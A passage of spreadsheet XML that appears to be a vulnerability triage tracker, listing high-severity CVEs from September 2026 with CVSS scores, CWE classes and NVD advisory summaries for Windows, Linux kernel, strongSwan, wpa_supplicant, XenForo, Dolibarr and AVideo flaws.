      <c r="H541" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr"/>
      <c r="Q541" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Pixar Labs Master Addons for Elementor allows Privilege Abuse.
This issue affects Master Addons for Elementor: from n/a through 3.2.2.</t>
        </is>
      </c>
      <c r="S541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62089</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K54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42" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr"/>
      <c r="Q542" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68889</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr"/>
      <c r="Q543" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69296</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr"/>
      <c r="Q544" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69313</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr"/>
      <c r="Q545" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69396</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr"/>
      <c r="Q546" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73321</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr"/>
      <c r="Q547" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an uncontrolled recursion vulnerability in the BBCode parser that allows authenticated attackers to cause persistent denial of service by submitting a post with deeply nested BBCode tags. Attackers can craft a single malicious post with sufficient nesting depth to exceed PHP's stack limit, causing fatal errors that repeatedly terminate PHP-FPM workers for all visitors rendering the affected thread.</t>
        </is>
      </c>
      <c r="S547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78134</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr"/>
      <c r="Q548" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R548" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.5.0 through 6.0.7 has Incorrect Access Control in the eap-ttls and eap-peap plugins because there can be a missing or mismatched inner EAP identity.</t>
        </is>
      </c>
      <c r="S548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78134</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78807</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr"/>
      <c r="Q549" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>An issue in wpa_supplicant all versions before v.2.12 allows a local attacker to bypass proper network context and AKMP matching for PMKSA caching via missing validation in the driver based PMKSA selection path in wpa.c</t>
        </is>
      </c>
      <c r="S549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78807</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80958</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr"/>
      <c r="Q550" s="5" t="inlineStr"/>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: clamp the tail kset read to the segment data region
The tail-kset read in cache_replay(), the writeback worker and the GC
worker bounds its length by PCACHE_SEG_SIZE - seg_off, the raw segment
size rather than the data region. A tail near the segment end reads past
the segment data into the following control area.
Clamp the read to cache_seg_remain(), the data region.</t>
        </is>
      </c>
      <c r="S550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80958</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81007</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr"/>
      <c r="Q551" s="5" t="inlineStr"/>
      <c r="R551" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmi: ipmb: validate write message length
ipmb_write() read message fields before validating the length byte.
A zero or short write can read uninitialized stack bytes.
A length smaller than the SMBus header underflows the block write length.
Require a non-empty buffer and the minimum IPMB request length.
Also require the length byte plus payload before parsing the message.</t>
        </is>
      </c>
      <c r="S551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81007</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81011</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr"/>
      <c r="Q552" s="5" t="inlineStr"/>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: pass validated element count to package parsers
The per-type package parsers are handed the wrong element count.
hp_init_bios_package_attribute() validates obj-&gt;package.count and then
calls one of the five hp_populate_*_package_data() wrappers (string,
integer, enumeration, ordered list, password). Each wrapper forwards a
count to its hp_populate_*_elements_from_package() parser, but instead
of forwarding the validated obj-&gt;package.count it derives the count
from elements[0]. elements[0] is the NAME field and is always an
ACPI_TYPE_STRING, so reading -&gt;package.count from it in fact reads
-&gt;string.length through the union acpi_object. The parsers thus bound
themselves against the length of the name string rather than against
the real number of elements in the package.
This is safe today because hp_init_bios_package_attribute() refuses any
package that has fewer than the type's element count, so a parser only
ever runs on a full package and never reads past it regardless of the
bogus bound.
An upcoming change relaxes that check to accept shorter packages. Once
a parser can receive fewer elements than its per-type count, a bound
taken from the name length no longer reflects the array size, and the
"elem &lt; count" loop conditions and "elem + n &gt;= count" sub-loop guards
read past the end of elements[] - an out-of-bounds heap read.
Forward the validated obj-&gt;package.count to every *_package_data()
wrapper so the parsers bound themselves against the real package size.
This does not change behaviour for the packages that enumerate
correctly today and is a prerequisite for accepting shorter packages
safely.</t>
        </is>
      </c>
      <c r="S552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81011</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89012</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr"/>
      <c r="Q553" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>Dolibarr 24.0.0 before 24.0.1 contains a case-sensitive denylist bypass vulnerability in the sqlfilters API query parameter that allows authenticated attackers to recover protected database fields by supplying uppercase variants of denylist-protected field names. Attackers can exploit the case-insensitive database column resolution against the case-sensitive denylist check in the core library to use prefix-matching predicates as a boolean oracle and extract full password hashes for any user account, including administrators.</t>
        </is>
      </c>
      <c r="S553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89012</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89245</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr"/>
      <c r="Q554" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in playlistRemove.php that allows attackers to delete playlists by skipping CSRF protection checks. Attackers can craft a malicious form that submits a POST request to playlistRemove.php, causing a victim's playlist to be deleted when they visit the attacker's page while logged in.</t>
        </is>
      </c>
      <c r="S554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89245</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89251</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr"/>
      <c r="Q555" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ad impressions in plugin/AD_Server/log.php, allowing logged-in users to submit arbitrary label values that trigger unverified wallet credits to campaign video owners. Attackers can repeatedly POST label=start requests to mint YPTWallet balance for any campaign video without proof an ad actually played.</t>
        </is>
      </c>
      <c r="S555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89251</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89252</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr"/>
      <c r="Q556" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to verify ownership in addLiveLink.php when updating LiveLinks, allowing authenticated users to modify other users' links. A canStream user can overwrite another user's LiveLink HLS source and metadata by supplying an existing linkId, redirecting viewers to attacker-controlled media.</t>
        </is>
      </c>
      <c r="S556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89252</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89443</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr"/>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: ISST: Validate level in perf mask ioctls
isst_if_get_perf_level_mask() and isst_if_get_base_freq_mask() use the
user-provided level as an index into perf_levels[] via
_read_pp_level_info() and _read_bf_level_info(), but neither helper
validates it first.
The adjacent level-info helpers reject levels above max_level before
reading the same per-level register block. Add the same bounds checks to
the mask helpers, and reject disabled SST-PP levels in
isst_if_get_perf_level_mask() to match isst_if_get_perf_level_info().
This prevents out-of-bounds reads from the per-level offset table on
invalid ioctl input.</t>
        </is>
      </c>
      <c r="S557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89443</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
